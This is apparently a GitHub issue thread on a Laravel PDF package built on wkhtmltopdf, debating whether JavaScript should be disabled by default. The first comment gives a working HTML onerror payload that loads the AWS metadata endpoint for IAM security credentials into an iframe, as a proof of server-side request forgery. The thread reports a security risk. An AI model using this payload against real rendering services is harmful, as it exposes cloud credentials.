Javascript security

[ricsands2801]

By using this package with disable-javascript not set it is possible to call the AWS metadata APIs. e.g.

<img src=\"https://img.uk/1.jpg\" onerror='var ifrm = document.createElement(\"iframe\");ifrm.setAttribute(\"src\", \"http://169.254.169.254/latest/meta-data/iam/security-credentials/{{profile}}\");ifrm.style.width = \"100px\";ifrm.style.height = \"1000px\";document.body.appendChild(ifrm);'></img>

I think shipping with javascript disabled by default is best with details on risks

[thelfensdrfer]

https://wkhtmltopdf.org/usage/wkhtmltopdf.txt

-n, --disable-javascript Do not allow web pages to run javascript --enable-javascript Do allow web pages to run javascript (default)

I think it should behave exactly like the original library does.

[stale[bot]]

This issue has been automatically marked as stale because it has not had recent activity. It will be closed if no further activity occurs. Any issues with PDF rendering itself that are not directly related to this package, should be reported on https://github.com/KnpLabs/snappy instead. When having doubts, please try to reproduce the issue with just snappy. If you believe this is an actual issue with the latest version of laravel-snappy, please reply to this issue so we can investigate further. Thank you for your contribution! Apologies for any delayed response on our side.